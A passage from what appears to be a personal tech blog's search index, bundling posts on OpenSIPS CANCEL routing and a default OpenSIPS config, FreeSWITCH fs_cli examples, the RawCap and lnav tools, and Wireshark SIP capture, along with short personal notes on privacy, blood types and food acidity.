CANCEL as you did for the INVITE. As stateless proxies usually have simple logic, this is not something difficult to do.\nBut what if the routing logic is complex, involving factors that make it hard to reproduce when handling the CANCEL? For example, the INVITE routing may depend on time conditions or dynamic data (that may change at any time).\nIn such cases, you must rely on a stateful routing (SIP transaction based). Basically the transaction engine in OpenSIPS will store and remember the information on where and how the INVITE was routed, so there is not need to “reproduce” that for the CANCEL request – you just fetch it from the transaction context. So, all the heavy lifting is done by the TM (transaction) module – you just have to invoke it:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { t_relay(); exit; } As you can see, there is no need to do any explicit routing for CANCEL requests – you just ask TM module to do it for you – as soon as the module sees you try to route a CANCEL,** it will automatically fetch the needed information from the INVITE transaction and set the proper routing **– all this magic happens inside the t_relay() function.\nNow, OpenSIPS is a multi-process application and INVITE requests may take time to be routed (due complex logic involving external queries or I/Os like DB, REST or others). So, you may end up with OpenSIPS handing the INVITE request in one process (for some time) while the corresponding CANCEL request starts being handled in another process. This may lead to some race conditions – if the INVITE is not yet processed and routed out, how will OpenSIPS know what to do with the CANCEL??\n多进程模式下的INVITE和CANCEL可能会导致条件竞争\nWell, if you cannot solve a race condition, better avoid it :). How? Postpone the CANCEL processing until the INVITE is done and routed. How? If there is no transaction created yet for the INVITE, avoid handling the CANCEL by simply dropping it – no worries, we will not lose the CANCEL as by dropping it, we will force the caller device to resend it over again.\nSo, we enhance our CANCEL scripting by checking for the INVITE transaction – this can be done via the t_check_trans() function. If we do not find the INVITE transaction, simple exit to drop the CANCEL request:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) t_relay(); exit; } 如何控制CANCEL请求Reason头? Propagating a correct Reason info in the CANCEL requests is equally important. For example, depending on the Reason for the canceled incoming call, a callee device may report it as a missed call (if the Reason header indicates a caller cancelling) or not (if the Reason header indicates that the call has established somewhere else, due to parallel forking).\nSo, you need to pay attention to propagating or inserting the Reason info into the CANCEL requests!For CANCEL requests built by OpenSIPS , the Reason header is inserted all the time, in order to reflect the reason for generating the CANCEL:\nSIP;cause=480;text=”NO_ANSWER” – if the cancelling was a result of an INVITE timeout; SIP;cause=200;text=”Call completed elsewhere” – if the cancelling was due to parallel forking (another branch of the call was answered); SIP;cause=487;text=”ORIGINATOR_CANCEL” – if the cancelling was received from a previous SIP hop (due an incoming CANCEL). So,** by default, OpenSIPS will discard the Reason info for the CANCEL requests that are received and relayed further** (and force the “ORIGINATOR_CANCEL” reason). But there are many cases when you want to keep and propagate further the incoming Reason header. To do that, you need to set the “0x08” flag when calling the t_relay() function for the CANCEL:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) # preserve the received Reason header t_relay(\u0026#34;8\u0026#34;); exit; } If there is no Reason in the incoming CANCEL, the default one will be inserted by OpenSIPS in the outgoing CANCEL.Even more, starting with the 2.3 version, OpenSIPS allows you to inject your own Reason header, by using the t_add_cancel_reason() function:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) { t_add_cancel_reason(\u0026#39;Reason: SIP ;cause=200;text=\u0026#34;Call completed elsewhere\u0026#34;\\r\\n\u0026#39;); t_relay(); } exit; } This function gives you full control over the Reason header and allows various implementation of complex scenarios, especially SBC and front-end like.\n","permalink":"https://wdd.js.org/opensips/blog/cancel-reason/","summary":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nCall canceling may look like a trivial mechanism, but it plays an important role in complex scenarios like simultaneous ringing (parallel forking), call pickup, call redirect and many others. So, aside proper routing of CANCEL requests, reporting the right cancelling reason is equally important.\n如何正确的处理cancel请求? According to RFC 3261,** a CANCEL must be route to the exact same destination (IP, port, protocol) and with the same exact Request-URI as the INVITE it is canceling**.","title":"CANCEL请求和Reason头"},{"content":"相比于wireshark, RawCap非常小,仅有48kb。\n使用RawCap命令需要使用管理员权限打开CMD,然后进入到RawCap.exe的目录。例如F:\\Tools\n显示网卡列表 输入RawCap.exe \u0026ndash;help, 可以显示命令的使用帮助、网卡列表还有使用例子。\nF:\\Tools\u0026gt;RawCap.exe --help NETRESEC RawCap version 0.2.0.0 Usage: RawCap.exe [OPTIONS] \u0026lt;interface\u0026gt; \u0026lt;pcap_target\u0026gt; \u0026lt;interface\u0026gt; can be an interface number or IP address \u0026lt;pcap_target\u0026gt; can be filename, stdout (-) or named pipe (starting with \\\\.\\pipe\\) OPTIONS: -f Flush data to file after each packet (no buffer) -c \u0026lt;count\u0026gt; Stop sniffing after receiving \u0026lt;count\u0026gt; packets -s \u0026lt;sec\u0026gt; Stop sniffing after \u0026lt;sec\u0026gt; seconds -m Disable automatic creation of RawCap firewall entry -q Quiet, don\u0026#39;t print packet count to standard out INTERFACES: 0. IP : 169.254.63.243 NIC Name : Local Area Connection NIC Type : Ethernet 1. IP : 192.168.1.129 NIC Name : WiFi NIC Type : Wireless80211 2. IP : 127.0.0.1 NIC Name : Loopback Pseudo-Interface 1 NIC Type : Loopback 3. IP : 10.165.240.132 NIC Name : Mobile 12 NIC Type : Wwanpp Example 1: RawCap.exe 0 dumpfile.pcap Example 2: RawCap.exe -s 60 127.0.0.1 localhost.pcap Example 3: RawCap.exe 127.0.0.1 \\\\.\\pipe\\RawCap Example 4: RawCap.exe -q 127.0.0.1 - | Wireshark.exe -i - -k :::warning 注意:\n执行RawCap.exe的时候,不要用 ./RawCap.exe , 直接用文件名 RawCap.exe 加执行参数 RawCap的功能很弱,没有包过滤。只能指定网卡抓包,然后保存为文件。 ::: 抓指定网卡的包 Example 1: RawCap.exe 0 dumpfile.pcap Example 2: RawCap.exe -s 60 127.0.0.1 localhost.pcap Example 3: RawCap.exe 127.0.0.1 \\\\.\\pipe\\RawCap Example 4: RawCap.exe -q 127.0.0.1 - | Wireshark.exe -i - -k 参考 https://www.netresec.com/?page=RawCap\n附件 附件中有两个版本的rawcap文件。\nraw-cap.zip ","permalink":"https://wdd.js.org/posts/2020/04/pfkelh/","summary":"相比于wireshark, RawCap非常小,仅有48kb。\n使用RawCap命令需要使用管理员权限打开CMD,然后进入到RawCap.exe的目录。例如F:\\Tools\n显示网卡列表 输入RawCap.exe \u0026ndash;help, 可以显示命令的使用帮助、网卡列表还有使用例子。\nF:\\Tools\u0026gt;RawCap.exe --help NETRESEC RawCap version 0.2.0.0 Usage: RawCap.exe [OPTIONS] \u0026lt;interface\u0026gt; \u0026lt;pcap_target\u0026gt; \u0026lt;interface\u0026gt; can be an interface number or IP address \u0026lt;pcap_target\u0026gt; can be filename, stdout (-) or named pipe (starting with \\\\.\\pipe\\) OPTIONS: -f Flush data to file after each packet (no buffer) -c \u0026lt;count\u0026gt; Stop sniffing after receiving \u0026lt;count\u0026gt; packets -s \u0026lt;sec\u0026gt; Stop sniffing after \u0026lt;sec\u0026gt; seconds -m Disable automatic creation of RawCap firewall entry -q Quiet, don\u0026#39;t print packet count to standard out INTERFACES: 0.","title":"window轻量级抓包工具RawCap介绍"},{"content":"\n1. 设置日志级别 每个快捷键对应一个功能,具体配置位于 /conf/autoload_configs/switch.conf.xml\nF1. help F2. status F3. show channels F4. show calls F5. sofia status F6. reloadxml F7. console loglevel 0 F8. console loglevel 7 F9. sofia status profile internal F10. sofia profile intrenal siptrace on F11. sofia profile internal siptrace off F12. version 2. 发起呼叫相关 下面的命令都是同步的命令,可以在所有命令前加bgapi命令,让originate命令后台异步执行。\n2.1 回音测试 originate user/1000 \u0026amp;echo 2.2 停泊 originate user/1000 \u0026amp;park # 停泊 2.3 保持 originate user/1000 \u0026amp;hold # 保持 2.4 播放放音 originate user/1000 \u0026amp;playback(/root/welclome.wav) # 播放音乐 2.5 呼叫并录音 originate user/1000 \u0026amp;record(/tmp/vocie_of_alice.wav) # 呼叫并录音 2.6 同振与顺振 #经过特定的SIP服务器发起外呼,下面的命令会将INVITE先发送到192.168.2.4:5060上 bgapi originate sofia/external/8005@001.com;fs_path=sip:192.168.2.4:5060 \u0026amp;echo 2.7 经过特定SIP服务器 #经过特定的SIP服务器发起外呼,下面的命令会将INVITE先发送到192.168.2.4:5060上 bgapi originate sofia/external/8005@001.com;fs_path=sip:192.168.2.4:5060 \u0026amp;echo 2.8 忽略early media originate {ignore_early_media=true}user/1000 \u0026amp;echo 2.9 播放假的early media originate {transfer_ringback=local_stream://moh}user/1000 \u0026amp;echo 2.10 立即播放early media originate {instant_ringback=true}{transfer_ringback=local_stream://moh}user/1000 \u0026amp;echo 2.11 设置外显号码 originate {origination_callee_id_name=7777}user/1000 通道变量将影响呼叫的行为。fs的通道变量非常多,就不再一一列举。具体可以参考。下面的链接\nhttps://freeswitch.org/confluence/display/FREESWITCH/Channel+Variables#app-switcher https://freeswitch.org/confluence/display/FREESWITCH/Channel+Variables+Catalog ","permalink":"https://wdd.js.org/freeswitch/fs-cli-example/","summary":"1. 设置日志级别 每个快捷键对应一个功能,具体配置位于 /conf/autoload_configs/switch.conf.xml\nF1. help F2. status F3. show channels F4. show calls F5. sofia status F6. reloadxml F7. console loglevel 0 F8. console loglevel 7 F9. sofia status profile internal F10. sofia profile intrenal siptrace on F11. sofia profile internal siptrace off F12. version 2. 发起呼叫相关 下面的命令都是同步的命令,可以在所有命令前加bgapi命令,让originate命令后台异步执行。\n2.1 回音测试 originate user/1000 \u0026amp;echo 2.2 停泊 originate user/1000 \u0026amp;park # 停泊 2.3 保持 originate user/1000 \u0026amp;hold # 保持 2.4 播放放音 originate user/1000 \u0026amp;playback(/root/welclome.","title":"fs_cli 例子"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;single-instance-no-db\u0026#34;) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure to enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } # absorb retransmissions, but do not create transaction t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Relay Forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); } exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/default/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.","title":"默认脚本"},{"content":"之前在百毒搜索了一下营养师考证,然后最近就经常收到骚扰电话,咨询我是否有意参加考试。\n在没有留任何电话号码的情况下,我的手机号就被精准的定位到。可想而知个人隐私问题是多么严重。\n以前只有皇帝一个人穿透明新装,现在每个人都穿着这件衣服。\n","permalink":"https://wdd.js.org/posts/2020/04/pgwzdz/","summary":"之前在百毒搜索了一下营养师考证,然后最近就经常收到骚扰电话,咨询我是否有意参加考试。\n在没有留任何电话号码的情况下,我的手机号就被精准的定位到。可想而知个人隐私问题是多么严重。\n以前只有皇帝一个人穿透明新装,现在每个人都穿着这件衣服。","title":"大数据时代的平民新装"},{"content":" 之前看过一个报道,父亲发现儿子的血型和自己以及妻子的血型都不一样,怀疑儿子不是自己亲生的,最后把自己妻儿弄死了。但是孩子的DNA检测显示是自己亲生的。\n这是一个不懂血型相关知识的悲剧啊。\n血型是由红细胞表面的两种抗原决定的。\nA抗原 B抗原 血型 1 0 A 0 1 B 1 1 AB 0 0 O 下图的表格是父母血型与子女血型的可能性与比例。\n父母血型 子女可能有血型及比例 子女不可能有血型 O、O O A、B、AB O、A O、A (1:3) B、AB O、B O、B (1:3) A、AB O、AB A、B (1:1) O、AB A、A O、A (1:15) B、AB A、B A、B、AB、O (3:3:9:1) — A、AB A、B、AB (4:1:3) O B、B O、B(1:15) A、AB B、AB A、B、AB(1:4:3) O AB、AB A、B、AB(1:1:2) O 虽说孩子的血型不一定和父母的血型相同。但是如果父母都是O型血,生出的孩子如果不是O型,那么不是亲生的可能性也是蛮大的。\n","permalink":"https://wdd.js.org/posts/2020/04/vhovyr/","summary":"之前看过一个报道,父亲发现儿子的血型和自己以及妻子的血型都不一样,怀疑儿子不是自己亲生的,最后把自己妻儿弄死了。但是孩子的DNA检测显示是自己亲生的。\n这是一个不懂血型相关知识的悲剧啊。\n血型是由红细胞表面的两种抗原决定的。\nA抗原 B抗原 血型 1 0 A 0 1 B 1 1 AB 0 0 O 下图的表格是父母血型与子女血型的可能性与比例。\n父母血型 子女可能有血型及比例 子女不可能有血型 O、O O A、B、AB O、A O、A (1:3) B、AB O、B O、B (1:3) A、AB O、AB A、B (1:1) O、AB A、A O、A (1:15) B、AB A、B A、B、AB、O (3:3:9:1) — A、AB A、B、AB (4:1:3) O B、B O、B(1:15) A、AB B、AB A、B、AB(1:4:3) O AB、AB A、B、AB(1:1:2) O 虽说孩子的血型不一定和父母的血型相同。但是如果父母都是O型血,生出的孩子如果不是O型,那么不是亲生的可能性也是蛮大的。","title":"孩子血型一定和父母血型相同吗?"},{"content":"大多数人可能由下面的两种方式去判断食物的酸碱性\n舌头👅。用嘴巴尝一下,酸的食物就是酸性的。 ph值。可以用ph试纸 以上两种判断食物酸碱性的方法都是错误的。 食物的酸碱性,取决于食物中含有矿物质的种类和含量。\n碱性食物:含有钠、钾、钙、镁、铁 酸性食物:还有磷、氯、硫 从元素周期表中也可以看出来,酸碱性相同的物质基本都是比较靠近的。\n含有钠钾钙镁铝的食物,进入人体之后,在人体的氧化作用下,最终代谢产物呈现碱性。\n另外,大部分的水果,例如柠檬、橙子、苹果这种的,吃起来是酸的,而实际上他们是碱性食物。\n食物分类表\n项目 举例 强酸性食物 牛肉、猪肉、鸡肉、金枪鱼、牡蛎、比目鱼、奶酪、米、麦、面包、酒类、花生、核桃、糖、饼干、啤酒等 弱酸性食物 火腿、鸡蛋、龙虾、章鱼、鱿鱼、荞麦、奶油、豌豆、鳗鱼、河鱼、巧克力、葱、空心粉、炸豆腐等 强碱性食物 茶、白菜、柿子、黄瓜、胡萝卜、菠菜、卷心菜、生菜、芋头、海带、柑橘、无花果、西瓜、葡萄、板栗、咖啡、葡萄酒等 弱碱性食物 豆腐、豌豆、大豆、绿豆、竹笋、马铃薯、香菇、蘑菇、油菜、南瓜、芹菜、番薯、莲藕、洋葱、茄子、萝卜、牛奶、苹果、梨、香蕉、樱桃等 ","permalink":"https://wdd.js.org/posts/2020/04/ly7nlv/","summary":"大多数人可能由下面的两种方式去判断食物的酸碱性\n舌头👅。用嘴巴尝一下,酸的食物就是酸性的。 ph值。可以用ph试纸 以上两种判断食物酸碱性的方法都是错误的。 食物的酸碱性,取决于食物中含有矿物质的种类和含量。\n碱性食物:含有钠、钾、钙、镁、铁 酸性食物:还有磷、氯、硫 从元素周期表中也可以看出来,酸碱性相同的物质基本都是比较靠近的。\n含有钠钾钙镁铝的食物,进入人体之后,在人体的氧化作用下,最终代谢产物呈现碱性。\n另外,大部分的水果,例如柠檬、橙子、苹果这种的,吃起来是酸的,而实际上他们是碱性食物。\n食物分类表\n项目 举例 强酸性食物 牛肉、猪肉、鸡肉、金枪鱼、牡蛎、比目鱼、奶酪、米、麦、面包、酒类、花生、核桃、糖、饼干、啤酒等 弱酸性食物 火腿、鸡蛋、龙虾、章鱼、鱿鱼、荞麦、奶油、豌豆、鳗鱼、河鱼、巧克力、葱、空心粉、炸豆腐等 强碱性食物 茶、白菜、柿子、黄瓜、胡萝卜、菠菜、卷心菜、生菜、芋头、海带、柑橘、无花果、西瓜、葡萄、板栗、咖啡、葡萄酒等 弱碱性食物 豆腐、豌豆、大豆、绿豆、竹笋、马铃薯、香菇、蘑菇、油菜、南瓜、芹菜、番薯、莲藕、洋葱、茄子、萝卜、牛奶、苹果、梨、香蕉、樱桃等 ","title":"食物的酸碱性的误解"},{"content":"大学,编程之师作业,曰:xxx功能,至少代码三千行。\n室友呕心沥血,废寝忘食,东拼西凑。奈何凑到代码一千行。\n友不释然,怏怏不乐。求助于我。\n于告知曰:此事易尔!但需可乐两瓶、瓜子两包。\n友悦之,曰:请稍等,片刻回。\n友即回,代码亦成。\n友黯然道:子之功力,无不及也。\n于笑曰:无他,但手熟而。\n多加注释多换行,一不留神三千行。\n😂😂😂😂🤣🤣🤣🤣😅😅😅😅\n","permalink":"https://wdd.js.org/posts/2020/03/wyeo4w/","summary":"大学,编程之师作业,曰:xxx功能,至少代码三千行。\n室友呕心沥血,废寝忘食,东拼西凑。奈何凑到代码一千行。\n友不释然,怏怏不乐。求助于我。\n于告知曰:此事易尔!但需可乐两瓶、瓜子两包。\n友悦之,曰:请稍等,片刻回。\n友即回,代码亦成。\n友黯然道:子之功力,无不及也。\n于笑曰:无他,但手熟而。\n多加注释多换行,一不留神三千行。\n😂😂😂😂🤣🤣🤣🤣😅😅😅😅","title":"代码增肥赋"},{"content":"","permalink":"https://wdd.js.org/posts/2020/03/eaikcr/","summary":"","title":"devicemap 驱动模式修改"},{"content":"lnav, 不需要服务端,不需要设置,仍然功能强大到没有朋友。\n速度与性能 lnav是一个可以运行在终端上的日志分析工具。功能非常强大,如果grep和tail等命令无法满足你的需求,或许你可以尝试一下lnav。\nlnav的官方仓库是https://github.com/tstack/lnav,在mac上可以使用 brew install lnav 命令安装这个命令。\n在我的4C8G的Macbook Pro上,打开一个2.8G的日志文件到渲染出现,需要花费约40s,平均每秒载入超过70MB。载入日志和渲染时,使用了接近100%的CPU。渲染完毕,使用1.2G的内存空间。\n总之呢,这个工具载入日志的速度很快。但是最好不要再生产环境上使用这个命令载入过大的日志文件,否则可能造成系统资源消耗太大的问题。\n在载入2.8G的日志文件后(3200多万行),过滤时显得非常卡顿,但是查看日志并不卡顿。\n在lnav的搜索关键字,下次打开其他日志时,lnav会自动搜索这个关键词。这是它的Session记录功能,可以使用Ctrl+R重置Session。\nlnav的特点\n语法高亮 各种过滤条件 多关键词过滤 各种快捷跳转 自带统计和可视化功能,比如使用条形图展示单位时间内的报错和日志数量 自动日志格式检查。支持很多种日志格式 能够按照时间去过滤日志 TAB自动补全 实时操作 支持SQL语法查日志 支持文件导出成其他格式 支持直接打开tar.gz等压缩后的日志文件 支持很多快捷键 x下面是按天的日志统计,灰色是普通日志,黄色是告警日志,红色的错误日志。三种颜色叠加的长度就是总日志。时间跨度单位也是可以调节的。最大跨度是一天,最短跨度是1秒。\n仍然是日志格式 自动日志格式检测 系统日志 Web服务器访问日志 报错日志 等等 过滤 可以设置多个过滤规则 时间线过滤 精确时间的日志 上个小时,下个小时 上一分钟,下一分钟 能够按照时间去追踪日志\n按照时间周期统计 统计每秒出现的错误,告警和总日志的量 语法高亮 Tab键自动补全 参考 https://lnav.readthedocs.io/en/latest/ 如果你更喜欢GUI工具,那也可以试试https://github.com/nickbnf/glogg 后记 最近因为工作需要,每天都会去排查很多的日志文件。我也曾想过装ELK之类的工具,但是我收到是文件。日志文件要转存到ELK中也要花功夫。另外ELK也是非常耗费资源的。ELK部署到一半我就果断放弃了。\n与其南辕北辙,不如回归本质。找些命令行的小工具直接分析日志文件。\n","permalink":"https://wdd.js.org/posts/2020/03/wikbh8/","summary":"lnav, 不需要服务端,不需要设置,仍然功能强大到没有朋友。\n速度与性能 lnav是一个可以运行在终端上的日志分析工具。功能非常强大,如果grep和tail等命令无法满足你的需求,或许你可以尝试一下lnav。\nlnav的官方仓库是https://github.com/tstack/lnav,在mac上可以使用 brew install lnav 命令安装这个命令。\n在我的4C8G的Macbook Pro上,打开一个2.8G的日志文件到渲染出现,需要花费约40s,平均每秒载入超过70MB。载入日志和渲染时,使用了接近100%的CPU。渲染完毕,使用1.2G的内存空间。\n总之呢,这个工具载入日志的速度很快。但是最好不要再生产环境上使用这个命令载入过大的日志文件,否则可能造成系统资源消耗太大的问题。\n在载入2.8G的日志文件后(3200多万行),过滤时显得非常卡顿,但是查看日志并不卡顿。\n在lnav的搜索关键字,下次打开其他日志时,lnav会自动搜索这个关键词。这是它的Session记录功能,可以使用Ctrl+R重置Session。\nlnav的特点\n语法高亮 各种过滤条件 多关键词过滤 各种快捷跳转 自带统计和可视化功能,比如使用条形图展示单位时间内的报错和日志数量 自动日志格式检查。支持很多种日志格式 能够按照时间去过滤日志 TAB自动补全 实时操作 支持SQL语法查日志 支持文件导出成其他格式 支持直接打开tar.gz等压缩后的日志文件 支持很多快捷键 x下面是按天的日志统计,灰色是普通日志,黄色是告警日志,红色的错误日志。三种颜色叠加的长度就是总日志。时间跨度单位也是可以调节的。最大跨度是一天,最短跨度是1秒。\n仍然是日志格式 自动日志格式检测 系统日志 Web服务器访问日志 报错日志 等等 过滤 可以设置多个过滤规则 时间线过滤 精确时间的日志 上个小时,下个小时 上一分钟,下一分钟 能够按照时间去追踪日志\n按照时间周期统计 统计每秒出现的错误,告警和总日志的量 语法高亮 Tab键自动补全 参考 https://lnav.readthedocs.io/en/latest/ 如果你更喜欢GUI工具,那也可以试试https://github.com/nickbnf/glogg 后记 最近因为工作需要,每天都会去排查很多的日志文件。我也曾想过装ELK之类的工具,但是我收到是文件。日志文件要转存到ELK中也要花功夫。另外ELK也是非常耗费资源的。ELK部署到一半我就果断放弃了。\n与其南辕北辙,不如回归本质。找些命令行的小工具直接分析日志文件。","title":"命令行日志查看神器:lnav"},{"content":"图解包在TCP/IP各个协议栈的流动情况\n点击查看【undefined】\n","permalink":"https://wdd.js.org/network/mlepcg/","summary":"图解包在TCP/IP各个协议栈的流动情况\n点击查看【undefined】","title":"网络包的封装和分用"},{"content":"1. 打开wireshark,并选择网卡 在过滤条件中输入sip 2. 选择电话-\u0026gt; VoIP Calls 3. 选中一条呼叫记录-\u0026gt;然后点击 Flow Sequence 4. 查看消息的详情 ","permalink":"https://wdd.js.org/opensips/tools/wireshark-sip/","summary":"1. 打开wireshark,并选择网卡 在过滤条件中输入sip 2. 选择电话-\u0026gt; VoIP Calls 3. 选中一条呼叫记录-\u0026gt;然后点击 Flow Sequence 4. 查看消息的详情 ","title":"Wireshark SIP 抓包"},{"content":"IP协议格式 字段说明 Protocol 表示上层协议,也就是传输层是什么协议。\n只需要看Decimal这列,常用的有6表示TCP, 17表示UDP, 50表示ESP。\n用wireshark抓包的时候,也可以看到Protocol: UDP(17)\n参考 https://tools.ietf.org/html/rfc791 https://tools.ietf.org/html/rfc790 https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers ","permalink":"https://wdd.js.org/network/ip-protocol/","summary":"IP协议格式 字段说明 Protocol 表示上层协议,也就是传输层是什么协议。\n只需要看Decimal这列,常用的有6表示TCP, 17表示UDP, 50表示ESP。\n用wireshark抓包的时候,也可以看到Protocol: UDP(17)\n参考 